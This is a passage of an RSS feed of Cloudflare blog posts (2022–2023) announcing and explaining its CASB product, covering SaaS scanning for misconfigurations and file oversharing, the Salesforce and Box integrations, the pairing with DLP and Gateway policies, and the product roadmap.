    <p>The first Software-as-a-Service. Salesforce, the sprawling, intricate, hard-to-contain Customer Relationship Management (CRM) platform, gives workforces a flexible hub from which they can do just as the software describes: manage customer relationships. Whether it be tracking deals and selling opportunities, managing customer conversations, or storing contractual agreements, Salesforce has truly become the ubiquitous solution for organizations looking for a way to manage every customer-facing interaction they have.</p><p>This reliance, however, also makes Salesforce a business data goldmine for bad actors.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7vgTUpghNJ4h0XJkjIUT1e/75b84bd59e6e64b1c5bd08a34f443c29/CASB_Salesforce_Findings.jpg" />
            
            </figure><p>With CASB’s new integration for Salesforce, IT and security operators will be able to quickly connect their environments and scan them for the kind of issues putting their sensitive business data at risk. Spot uploaded files that have been shared publicly with anyone who has the link. Identify default permissions that give employees access to records that should be need-to-know only. You can even see employees who are sending out emails as other Salesforce users!</p><p>Using this new integration, we’re excited to help close the security visibility gap for yet another SaaS app serving as the lifeblood for teams out in the field making business happen.</p>
    <div>
      <h3>Scan Box with Cloudflare CASB</h3>
      <a href="#scan-box-with-cloudflare-casb">
        
      </a>
    </div>
    <p>Box is the leading Content Cloud that enables organizations to accelerate business processes, power workplace collaboration, and protect their most valuable information, all while working with a best-of-breed enterprise IT stack like Cloudflare.</p><p>A platform used to store everything - from contracts and financials to product roadmaps and employee records - Box has given collaborative organizations a single place to convene and share information that, in a growing remote-first world, has no better place to be stored.</p><p>So where are disgruntled employees and people with malicious intent going to look when they want to unveil private business files?</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CACCaqOTfhtpJvlYrA4S7/fad020b308d04bcdd7f36db93ab01e13/CASB_Box_Findings.jpg" />
            
            </figure><p>With Cloudflare CASB’s new integration for Box, security and IT teams alike can now link their admin accounts and scan them for under-the-radar security issues leaving them prone to compromise and data exfiltration. In addition to Box’s built-in content and collaboration security, Cloudflare CASB gives you another added layer of protection where you can catch files and folders shared publicly or with users outside your organization. By providing security admins with a single view to see employees who aren’t following security policies, we make it harder for bad actors to get inside and do damage.</p><p>With Cloudflare’s status as an official <a href="https://www.box.com/integrations/boxtrustpartnerprogram">Box Technology Partner</a>, we’re looking forward to offering both Cloudflare and Box users a robust, yet easy-to-use toolset that can help stop pressing, real-world data security incidents right in their tracks.</p><blockquote><p><i>“Organizations today need products that are inherently secure to support employees working from anywhere,”</i> said <b>Areg Alimian</b>, Head of Security Products at Box. <i>“At Box, we continuously strive to improve our integrations with third-party apps so that it’s easier than ever for customers to use Box alongside best-in-class solutions. With today’s integration with Cloudflare CASB, we enable our joint customers to have a single pane of glass view allowing them to consistently enforce security policies and protect leakage of sensitive information across all their apps.”</i></p></blockquote>
    <div>
      <h3>Taking action on your business data security</h3>
      <a href="#taking-action-on-your-business-data-security">
        
      </a>
    </div>
    <p>Salesforce and Box are certainly not the only SaaS applications managing this type of sensitive organizational data. At Cloudflare, we strive to make our products as widely compatible as possible so that organizations can continue to place their trust and confidence in us to help keep them secure.</p><p>Today, Cloudflare CASB supports integrations with Google Workspace, Microsoft 365, Slack, GitHub, Salesforce, and Box, with a growing list of other critical applications on their way, so if there’s one in particular you’d like to see soon, <a href="https://docs.google.com/forms/d/e/1FAIpQLSfRlXT3ux2yDaFcCQO4orj1uQZjZyGqLr7vWH2odwUZtwPcpg/viewform">let us know</a>!</p><p>For those not already using Cloudflare Zero Trust, don’t hesitate to get started today - see the platform yourself with 50 free seats by signing up <a href="https://dash.cloudflare.com/sign-up/teams">here</a>, then get in touch with our team <a href="https://www.cloudflare.com/products/zero-trust/">here</a> to learn more about how Cloudflare CASB can help your organization lock down its SaaS apps.</p> ]]></content:encoded>
            <category><![CDATA[CIO Week]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[SaaS]]></category>
            <guid isPermaLink="false">r0pkkKPl4CdJgLGGQAMHr</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare CASB and DLP work together to protect your data]]></title>
            <link>https://blog.cloudflare.com/casb-dlp/</link>
            <pubDate>Wed, 11 Jan 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare CASB and DLP will work together to protect sensitive data at rest. ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Wqq52bJYYraL6kGegsWIc/d2b89355122ed7b0055bf5de4cc4847b/image4-12.png" />
            
            </figure><p>Cloudflare’s Cloud Access Security Broker (CASB) <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">scans SaaS applications</a> for misconfigurations, unauthorized user activity, shadow IT, and other data security issues. Discovered security threats are called out to IT and security administrators for timely remediation, removing the burden of endless manual checks on a long list of applications.</p><p>But Cloudflare customers revealed they want more information available to assess the risk associated with a misconfiguration. A publicly exposed intramural kickball schedule is not nearly as critical as a publicly exposed customer list, so customers want them treated differently. They asked us to identify where sensitive data is exposed, reducing their assessment and remediation time in the case of leakages and incidents. With that feedback, we recognized another opportunity to do what Cloudflare does best: combine the best parts of our products to solve customer problems.</p><p>What’s underway now is an exciting effort to provide <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> users a way to get the same DLP coverage for more than just sensitive data going over the network: SaaS DLP for data stored in popular SaaS apps used by millions of organizations.</p><p>With these upcoming capabilities, customers will be able to connect their SaaS applications in just a few clicks and scan them for sensitive data - such as PII, PCI, and even custom regex - stored in documents, spreadsheets, PDFs, and other uploaded files. This gives customers the signals to quickly assess and remediate major security risks.</p>
    <div>
      <h3>Understanding CASB</h3>
      <a href="#understanding-casb">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5vES53c15VUuvf2jGa0tGh/7ac679bf0220f2b6ee3076ddf34fc4a5/image2.jpg" />
            
            </figure><p>Released in September, Cloudflare’s API CASB has already enabled organizations to quickly and painlessly deep-dive into the security of their SaaS applications, whether it be Google Workspace, Microsoft 365, or any of the other SaaS apps we support (including Salesforce and Box released today). With CASB, operators have been able to understand what SaaS security issues could be putting their organization and employees at risk, like insecure settings and misconfigurations, files shared inappropriately, user access risks and best practices not being followed.</p><p>“But what about the sensitive data stored <i>inside</i> the files we’re collaborating on? How can we identify that?”</p>
    <div>
      <h3>Understanding DLP</h3>
      <a href="#understanding-dlp">
        
      </a>
    </div>
    <p>Also released in September, Cloudflare DLP for data in-transit has provided users of Gateway, Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway (SWG)</a>, a way to manage and outright block the movement of sensitive information into and out of the corporate network, preventing it from landing in the wrong hands. In this case, DLP can spot sensitive strings, like credit card and social security numbers, as employees attempt to communicate them in one form or another, like uploading them in a document to Google Drive or sent in a message on Slack. Cloudflare DLP blocks the HTTP request before it reaches the intended application.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Tioay2oFOuQnRla7yv3Ty/94d810dcd8faa75059ca4a73f445bcc9/image3-14.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1qDIi5N0R3koBNDcpbQQBg/f7e21759ba2778d1d9b2a87fbd125978/image1-25.png" />
            
            </figure><p>But once again we received the same questions and feedback as before.</p><p>“What about data in our SaaS apps? The information stored there won’t be visible over the network.”</p>
    <div>
      <h3>CASB + DLP, Better Together</h3>
      <a href="#casb-dlp-better-together">
        
      </a>
    </div>
    <p>Coming in early 2023, Cloudflare Zero Trust will introduce a new product synergy that allows customers to peer into the files stored in their SaaS applications and identify any particularly sensitive data inside them.</p><p>Credit card numbers in a Google Doc? No problem. Social security numbers in an Excel spreadsheet? CASB will let you know.</p><p>With this product collaboration, Cloudflare will provide IT and security administrators one more critical area of security coverage, rounding out our data loss prevention story. Between DLP for data in-transit, CASB for file sharing monitoring, and even <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">Remote Browser Isolation (RBI)</a> and Area 1 for data in-use DLP and email DLP, respectively, organizations can take comfort in knowing that their bases are covered when it comes to <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">data exfiltration</a> and misuse.</p><p>While development continues, we’d love to hear how this kind of functionality could be used at an organization like yours. Interested in learning more about either of these products or what’s coming next? Reach out to your account manager or <a href="https://www.cloudflare.com/lp/cio-week-2023-cloudflare-one-contact-us/">click here to get in touch</a> if you’re not already using Cloudflare.</p> ]]></content:encoded>
            <category><![CDATA[CIO Week]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[DLP]]></category>
            <guid isPermaLink="false">6uJb9raFodA5Si2waedXl8</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
            <dc:creator>Noelle Kagan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Gateway + CASB: alphabetti spaghetti that spells better SaaS security]]></title>
            <link>https://blog.cloudflare.com/gateway-casb-in-action/</link>
            <pubDate>Fri, 30 Sep 2022 13:02:00 GMT</pubDate>
            <description><![CDATA[ Now that Cloudflare CASB is Generally Available, let’s take a look at how users have been leveraging other Cloudflare Zero Trust products with CASB, starting with Gateway ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Back in June 2022, we <a href="/announcing-gateway-and-casb/">announced</a> an upcoming feature that would allow for Cloudflare Zero Trust users to easily create prefilled HTTP policies in <a href="https://www.cloudflare.com/products/zero-trust/gateway/">Cloudflare Gateway</a> (Cloudflare’s Secure Web Gateway solution) via issues identified by CASB, a <a href="/casb-ga/">new Cloudflare product</a> that connects, scans, and monitors your SaaS apps - like Google Workspace and Microsoft 365 - for security issues.</p><p>With Cloudflare’s 12th Birthday Week nearing its end, we wanted to highlight, in true Cloudflare fashion, this new feature in action.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3mSpcUDLz1bZgXJbt1nTfR/e04400bed656f582031080e1433eeda7/image2-65.png" />
            
            </figure>
    <div>
      <h3>What is CASB? What is Gateway?</h3>
      <a href="#what-is-casb-what-is-gateway">
        
      </a>
    </div>
    <p>To quickly recap, Cloudflare’s API-driven <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">CASB</a> offers IT and security teams a fast, yet effective way to connect, scan, and monitor their SaaS apps for security issues, like file exposures, misconfigurations, and Shadow IT. In just a few clicks, users can see an exhaustive list of security issues that may be affecting the security of their SaaS apps, including Google Workspace, Microsoft 365, Slack, and GitHub.</p><p>Cloudflare Gateway, our <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway (SWG)</a> offering, allows teams to monitor and control the outbound connections originating from endpoint devices. For example, don’t want your employees to access gambling and social media websites on company devices? Just block access to them in our easy-to-use <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> dashboard.</p>
    <div>
      <h3>The problems at hand</h3>
      <a href="#the-problems-at-hand">
        
      </a>
    </div>
    <p>As we highlighted in our first post, Shadow IT - or unapproved third-party applications being used by employees - continues to be one of the biggest pain points for IT administrators in the cloud era. When employees grant access to external services without the consent of their IT or security department, they risk granting bad actors access to some of the company’s most sensitive data stored in these SaaS applications.</p><p>Another major issue affecting the security of data stored in the cloud is file exposure in the form of oversharing. When an employee shares a highly sensitive Google Doc to someone via a public link, would your IT or security team know about it? And even if they do, do they have a way to minimize the risk and block access to it?</p><p>With these two products now being used by customers around the world, we’re excited to share how visibility and basic awareness of SaaS security issues doesn’t have to be the end of it. What are admins supposed to do next?</p>
    <div>
      <h3>Gateway + CASB: blocking identified threats in three (yes, three) clicks</h3>
      <a href="#gateway-casb-blocking-identified-threats-in-three-yes-three-clicks">
        
      </a>
    </div>
    <p>Now, when CASB discovers a problem (which we call a <i>Finding</i>), it’s now possible to easily create a corresponding Gateway policy in as few as three clicks.</p><p>This means users can now automatically generate fine-grained Gateway policies to prevent specific inappropriate behavior from continuing, while still allowing for expected access and usage that meets company policy.</p>
    <div>
      <h3>Example 1: Block employees from uploading to their personal Google Drive</h3>
      <a href="#example-1-block-employees-from-uploading-to-their-personal-google-drive">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2TBhfuLYq8CDoKSh96WedR/80b80b4b13d281adc149dbce061b2759/image3-49.png" />
            
            </figure><p>A common use case we heard during CASB’s beta program was the tendency for employees to upload corporate data - documents, spreadsheets, files, folders,  etc. - to their personal Google Drive (or similar) accounts, presenting the risk of intellectual property making its way out of a secure corporate environment. With Gateway and CASB working together, IT administrators can now directly <a href="https://developers.cloudflare.com/cloudflare-one/policies/filtering/http-policies/tenant-control/">block upload activity</a> from anywhere other than their corporate tenant of Google Drive or Microsoft OneDrive.</p>
    <div>
      <h3>Example 2: Restrict repeat oversharers from uploading and downloading files</h3>
      <a href="#example-2-restrict-repeat-oversharers-from-uploading-and-downloading-files">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17jgB11afm3st3RD6lncrp/42492a4ff1466915e6a12f1677630f91/image1-80.png" />
            
            </figure><p>A great existing use case of Cloudflare CASB has been the ability to identify employees that are habitual oversharers of files in their corporate Google or Microsoft tenants - sharing files to anyone that has the link, sharing files with emails outside their company, etc.</p><p>Now when these employees are identified, CASB admins can create Gateway policies to block specific users from further upload and download activity until the behavior has been addressed.</p>
    <div>
      <h3>Example 3: Prevent file uploads to unapproved, Shadow IT applications</h3>
      <a href="#example-3-prevent-file-uploads-to-unapproved-shadow-it-applications">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7HWqMKv1qTuHvEh45HwSX/92e3016aaa54185167ee6e8051d77e2c/image4-27.png" />
            
            </figure><p>To address the concern of Shadow IT, CASB-originating Gateway policies can be customized, including being able to restrict upload and download events to only the SaaS applications your organization uses. Let’s say your company uses Box as its file storage solution; in just a few clicks, you can use an identified CASB Finding to create a Gateway policy that blocks activity to any file sharing application other than Box. This gives IT and security admins the peace of mind that their files will only end up in the approved cloud application they use.</p>
    <div>
      <h3>Get started today with the Cloudflare Zero Trust</h3>
      <a href="#get-started-today-with-the-cloudflare-zero-trust">
        
      </a>
    </div>
    <p>Ultimately, the power of Cloudflare Zero Trust comes from its existence as a single, unified platform that draws strength from its combination of products and features. As we continue our work towards bringing these new and exciting offerings to market, we believe that it’s just as important to highlight their synergies and associated use cases, this time from Cloudflare Gateway and CASB.</p><p>For those not already using Cloudflare Zero Trust, don’t hesitate to get started today - see the platform yourself with 50 free seats by <a href="https://dash.cloudflare.com/sign-up">signing up here</a>.</p><p>For those who already know and love Cloudflare Zero Trust, reach out to your Cloudflare sales contact to get started with CASB and Gateway. We can’t wait to hear what interesting and exciting use cases you discover from this new cross-product functionality.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">FZuN3uIXuOg76s1qTyfZy</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[Detect security issues in your SaaS apps with Cloudflare CASB]]></title>
            <link>https://blog.cloudflare.com/casb-ga/</link>
            <pubDate>Tue, 20 Sep 2022 13:00:00 GMT</pubDate>
            <description><![CDATA[ Connect and scan your third-party SaaS apps for file leaks, misconfigurations, and Shadow IT, all in just a few clicks. Cloudflare CASB now Generally Available ]]></description>
            <content:encoded><![CDATA[ <p></p><p>It’s GA Week here at Cloudflare, meaning some of our latest and greatest endeavors are here and ready to be put in the hands of Cloudflare customers around the world. One of those releases is Cloudflare’s API-driven Cloud Access Security Broker, or <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">CASB</a>, one of the newest additions to our <a href="https://www.cloudflare.com/products/zero-trust/">Zero Trust platform</a>.</p><p>Starting today, IT and security administrators can begin using <a href="https://www.cloudflare.com/products/zero-trust/casb/">Cloudflare CASB</a> to connect, scan, and <a href="https://www.cloudflare.com/application-services/solutions/app-performance-monitoring/">monitor their third-party SaaS applications</a> for a wide variety of security issues - all in just a few clicks.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1vuJA1D61molQYhcWYK9G8/8ed6449cf3e58493f203363791ecf4ff/image2-13.png" />
            
            </figure><p>Whether it’s auditing Google Drive for data exposure and file oversharing, checking Microsoft 365 for misconfigurations and insecure settings, or reviewing <a href="https://www.cloudflare.com/products/zero-trust/third-party-access/">third-party access</a> for Shadow IT, CASB is now here to help organizations establish a direct line of sight into their SaaS app security and DLP posture.</p>
    <div>
      <h3>The problem</h3>
      <a href="#the-problem">
        
      </a>
    </div>
    <p>Try to think of a business or organization that uses fewer than 10 SaaS applications. Hard, isn’t it?</p><p>It’s 2022, and by now, most of us have noticed the trend of mass SaaS adoption balloon over recent years, with some organizations utilizing hundreds of third-party services across a slew of internal functions. Google Workspace and Microsoft 365 for business collaboration. Slack and Teams for communication. Salesforce for customer management, GitHub for version control… the list goes on and on and on.</p><p>And while the average employee might see these products as simply tools used in their day-to-day work, the reality is much starker than that. Inside these services lie some of an organization’s most precious, sensitive, business-critical data - something IT and security teams don’t take lightly and strive to protect at all costs.</p><p>But there hasn’t been a great way for these teams to ensure their data and the applications that contain it are kept secure. Go user by user, file by file, SaaS app by SaaS app and review everything for what could be potentially problematic? For most organizations, that’s just simply not realistic.</p><p>So, doing what Cloudflare does best, how are we helping our users get a grip on this wave of growing security risk in an intuitive and manageable way?</p>
    <div>
      <h3>The solution</h3>
      <a href="#the-solution">
        
      </a>
    </div>
    <p>Connect your most critical SaaS applications in just minutes and clicks</p><p>It all starts with a simple integration process, connecting your favorite SaaS applications to Cloudflare CASB in just a few clicks. Once connected, you’ll instantly begin to see <i>Findings</i> - or identified security issues - appear on your CASB home page.</p><p>CASB utilizes each vendor’s API to scan and identify a range of application-specific security issues that span several domains of information security, including misconfigurations and insecure settings, file sharing security, Shadow IT, best practices not being followed, and more.</p><p>Today CASB supports integrations with Google Workspace, Microsoft 365, Slack, and GitHub, with a growing list of other critical applications not far behind. Have a SaaS app you want to see next? <a href="https://forms.gle/zN6W8K3ys3RyaQu86">Let us know</a>!</p><p>See how all your files have been shared</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3jz5NNEO31yqGuxl19ljUs/5d0fb722502b4217f300f5564be9962f/image3-9.png" />
            
            </figure><p>One of the easiest ways for employees to accidentally expose internal information is usually with just the flick of a switch - changing a sharing setting to <i>Share this file to anyone with the link</i>.</p><p>Cloudflare CASB provides users an exhaustive list of files that have questionable, often insecure, sharing settings, giving them a fast and reliable way to address low-hanging fruit exposures and get ahead of data protection incidents.</p><p>Identify insecure settings and bad practices</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4AweM5BmHVJZlqqnbL46Tl/fad098bee4fcf7c616acd16e39afb7bf/image5-4.png" />
            
            </figure><p>How we configure our SaaS apps dictates how they keep our data secure. Would you know if that one important GitHub repository had its visibility changed from Private to Public overnight? And why does one of our IT admins not have 2FA enabled on their account?</p><p>With Cloudflare CASB, users can now see those issues in just a few clicks and prioritize misconfigurations that might not expose just one file, but the entirety of them across your organization’s SaaS footprint.</p><p>Discover third-party apps with shadowy permissions</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/74DjxhmE1iGNgchSmmcepx/a8f04a52baea4e3f6fe7a1f343fcccc5/image4-5.png" />
            
            </figure><p>With the advent of frictionless product signups comes the rise of third-party applications that have breezed past approval processes and internal security reviews to lay claim to data and other sensitive resources. You guessed it, we’re talking about Shadow IT.</p><p>Cloudflare CASB adds a layer of access visibility beyond what traditional network-based Shadow IT discovery tools (like <a href="https://www.cloudflare.com/products/zero-trust/gateway/">Cloudflare Gateway</a>) can accomplish on their own, providing a detailed list of access that’s been granted to third-party services via those easy <i>Sign in with Google</i> buttons.</p>
    <div>
      <h3>So, why does this matter in the context of Zero Trust?</h3>
      <a href="#so-why-does-this-matter-in-the-context-of-zero-trust">
        
      </a>
    </div>
    <p>While we’re here to talk about CASB, it would be remiss if we didn’t acknowledge how CASB is only one piece of the puzzle in the wider context of Zero Trust.</p><p><a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> is all about broad security coverage and simple interconnectivity with how employees access, navigate, and leverage the complex systems and services needed to operate every day. Where <a href="https://www.cloudflare.com/products/zero-trust/access/">Cloudflare Access</a> and Gateway have provided users with <a href="https://www.cloudflare.com/learning/access-management/what-is-access-control/">granular access control</a> and visibility into how employees traverse systems, and where <a href="https://www.cloudflare.com/products/zero-trust/browser-isolation/">Browser Isolation</a> and our new <a href="https://www.cloudflare.com/products/zero-trust/dlp/">in-line DLP</a> offering protect users from malicious sites and limit sensitive data flying over the wire, CASB adds coverage for one of enterprise security’s final frontiers: visibility into data at-rest, who/what has access to it, and the practices that make it easier or harder for someone to access it inappropriately.</p>
    <div>
      <h3>How to get started</h3>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>As we’ve found through CASB’s beta program over the last few months, SaaS sprawl and misuse compounds with time - we’ve already identified more than five million potential security issues across beta users, with some organizations seeing several thousand files flagged as needing a sharing setting review.</p><p>So don’t hesitate to get started on your SaaS app wrangling and cleanup journey; it’s easier than you might think.</p><p>To get started, create a <a href="https://dash.cloudflare.com/sign-up/teams">free Zero Trust account</a> to try it out with 50 free seats, and then get in touch with our team <a href="https://www.cloudflare.com/products/zero-trust/casb/">here</a> to learn more about how Cloudflare CASB can help at your organization. We can’t wait to hear what you think.</p>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div></div><p></p> ]]></content:encoded>
            <category><![CDATA[GA Week]]></category>
            <category><![CDATA[General Availability]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[SaaS]]></category>
            <guid isPermaLink="false">s7VV7AIcGZnpvE4jjwlCs</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[Announcing Gateway + CASB]]></title>
            <link>https://blog.cloudflare.com/announcing-gateway-and-casb/</link>
            <pubDate>Fri, 24 Jun 2022 13:00:04 GMT</pubDate>
            <description><![CDATA[ Find and fix shadow IT with Cloudflare’s Secure Web Gateway and API-driven Cloud Access Security Broker (CASB) ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Shadow IT and managing access to sanctioned or unsanctioned SaaS applications remain one of the biggest pain points for IT administrators in the era of the cloud.</p><p>We're excited to announce that starting soon, Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">Secure Web Gateway</a> and our new API-driven Cloud Access Security Broker (CASB) work seamlessly together to help IT and security teams go from finding Shadow IT to fixing it in minutes.</p>
    <div>
      <h3>Detect security issues within SaaS applications</h3>
      <a href="#detect-security-issues-within-saas-applications">
        
      </a>
    </div>
    <p>Cloudflare's API-driven [CASB](API-driven CASB starts) starts by providing comprehensive visibility into SaaS applications, so you can easily <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/">prevent data leaks</a> and compliance violations. Setup takes just a few clicks to integrate with your organization's SaaS services, like Google Workspace and Microsoft 365. From there, IT and security teams can see what applications and services their users are logging into and how company data is being shared.</p><p>So you’ve found the issues. But what happens next?</p>
    <div>
      <h3>Identify and detect, but then what?</h3>
      <a href="#identify-and-detect-but-then-what">
        
      </a>
    </div>
    <p>Customer feedback from the API-driven CASB beta has followed a similar theme: <i>it was super easy to set up and detect all my security issues, but how do I fix this stuff?</i></p><p>Almost immediately after investigating the most critical issues, it makes sense to want to start taking action. Whether it be detecting an unknown application being used for Shadow IT or wanting to limit functionality, access, or behaviors to a known but unapproved application, remediation is front of mind.</p><p>This led to customers feeling like they had a bunch of useful data in front of them, but no clear action to take to get started on fixing them.</p>
    <div>
      <h3>Create Gateway policies from CASB security findings</h3>
      <a href="#create-gateway-policies-from-casb-security-findings">
        
      </a>
    </div>
    <p>To solve this problem, we’re allowing you to easily create Gateway policies from CASB <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/#view-security-findings">security findings</a>. Security findings are issues detected within SaaS applications that involve users, data at rest, and settings that are assigned a Low, Medium, High or Critical severity per integration.</p><p>Using the security findings from CASB allows for fine-grained Gateway policies which prevent future unwanted behavior while still allowing usage that aligns to company security policy. This means going from viewing a CASB security issue, like the use of an unapproved SaaS application, to preventing or controlling access in minutes. This seamless cross-product experience all happens from a single, unified platform.</p><p>For example, take the CASB Google Workspace <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/google-workspace/#third-party-apps">security finding around third-party apps</a> which detects sign-ins or other permission sharing from a user's account. In just a few clicks, you can create a Gateway policy to block some or all of the activity, like uploads or downloads, to the detected SaaS application. This policy can be applied to some or all users, based on what access has been granted to the user’s account.</p><p>By surfacing the exact behavior with CASB, you can take swift and targeted action to better protect your organization with Gateway.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/yn5pqqYDDAvwF5IN25dEj/9b603887cb14e1f7f01ff25dbaf66acf/image1-44.png" />
            
            </figure>
    <div>
      <h3>Get started today with the Cloudflare One</h3>
      <a href="#get-started-today-with-the-cloudflare-one">
        
      </a>
    </div>
    <p>This post highlights one of the many ways the Cloudflare One suite of solutions work seamlessly together as a unified platform to find and fix security issues across SaaS applications.</p><p>Get started now with Cloudflare’s Secure Web Gateway by <a href="https://dash.cloudflare.com/sign-up/teams">signing up here</a>. Cloudflare’s API-driven CASB is in closed beta with new customers being onboarded each week. You can <a href="https://www.cloudflare.com/products/zero-trust/lp/casb-beta/">request access here</a> to try out this exciting new cross-product feature.</p><p>To learn more about simplifying the way you protect SaaS applications, <a href="https://cfl.re/saas-security-whitepaper">read our whitepaper</a>.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare One Week]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Secure Web Gateway]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">6kEpWG201kBCnNMiW0zTBW</guid>
            <dc:creator>Corey Mahan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Managing Clouds - Cloudflare CASB and our not so secret plan for what’s next]]></title>
            <link>https://blog.cloudflare.com/managing-clouds-cloudflare-casb/</link>
            <pubDate>Fri, 18 Mar 2022 13:00:08 GMT</pubDate>
            <description><![CDATA[ Right now we’re working on making the out-of-band CASB product a seamless part of the Zero Trust platform ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Last month we introduced Cloudflare’s new API–driven <a href="/cloudflare-zero-trust-casb/">Cloud Access Security Broker (CASB)</a> via the acquisition of Vectrix. As a quick recap, Cloudflare’s CASB helps IT and security teams detect security issues in and across their SaaS applications. We look at both data and users in SaaS apps to alert teams to issues ranging from unauthorized user access and file exposure to misconfigurations and shadow IT.</p><p>I’m excited to share two updates since we announced the introduction of <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">CASB functionality</a> to Cloudflare Zero Trust. First, we’ve heard from Cloudflare customers who cannot wait to deploy the CASB and want to use it in more depth. Today, we’re outlining what we’re building next, based on that feedback, to give you a preview of what you can expect. Second, we’re opening the sign-up for our beta, and I’m going to walk through what will be available to new users as they are invited from the waitlist.</p>
    <div>
      <h2>What’s next in Cloudflare CASB?</h2>
      <a href="#whats-next-in-cloudflare-casb">
        
      </a>
    </div>
    <p>The vision for Cloudflare’s API–driven CASB is to provide IT and security owners an easy-to-use, one-stop shop to protect the security of their data and users across their fleet of SaaS tools. Our goal is to make sure any IT or security admin can go from <a href="https://dash.cloudflare.com/sign-up/teams">creating a Zero Trust account</a> for the first time to protecting what matters most in minutes.</p><p>Beyond that immediate level of visibility, we know the problems discovered by IT and security administrators still require time to find, understand, and resolve. We’re introducing three new features to the core CASB platform in the coming months to address each of those challenges.</p>
    <div>
      <h3>New integrations (with more yet to come)</h3>
      <a href="#new-integrations-with-more-yet-to-come">
        
      </a>
    </div>
    <p>First, what are integrations? Integrations are what we call the method to grant permissions and connect SaaS applications (via API) to CASB for security scanning and management. Generally speaking, integrations are done following an OAuth 2.0 flow, however this varies between third-party SaaS apps. Aligning to our goal, we’ll always make sure that integration set up flows are as simple as possible and can be done in minutes.</p><p>As with most security strategies, protecting your most critical assets first becomes the priority. Integrations with Google Workspace and GitHub will be available in beta (<a href="https://www.cloudflare.com/products/zero-trust/lp/casb-beta/">request access here</a>). We’ll soon follow with integrations to Zoom, Slack, and Okta before adding services like Microsoft 365 and Salesforce later this year. Working closely with customers will drive which applications we integrate with next.</p>
    <div>
      <h3>SaaS asset management</h3>
      <a href="#saas-asset-management">
        
      </a>
    </div>
    <p>On top of integrations, managing the various assets, or “digital nouns” like users, data, folders, repos, meetings, calendars, files, settings, recordings, etc. across services is tricky to say the least. Spreadsheets are hard to manage for tracking who has access to what or what files have been shared with whom.</p><p>This isn’t efficient and is ripe for human error. CASB SaaS asset management allows IT and security teams to view all of their data settings and user activity around said data from a single dashboard. Quickly being able to answer questions like; “did we disable the account for a user across these six services?” becomes a quick task instead of logging into each service and addressing individually.</p>
    <div>
      <h3>Remediation guides + automated workflows</h3>
      <a href="#remediation-guides-automated-workflows">
        
      </a>
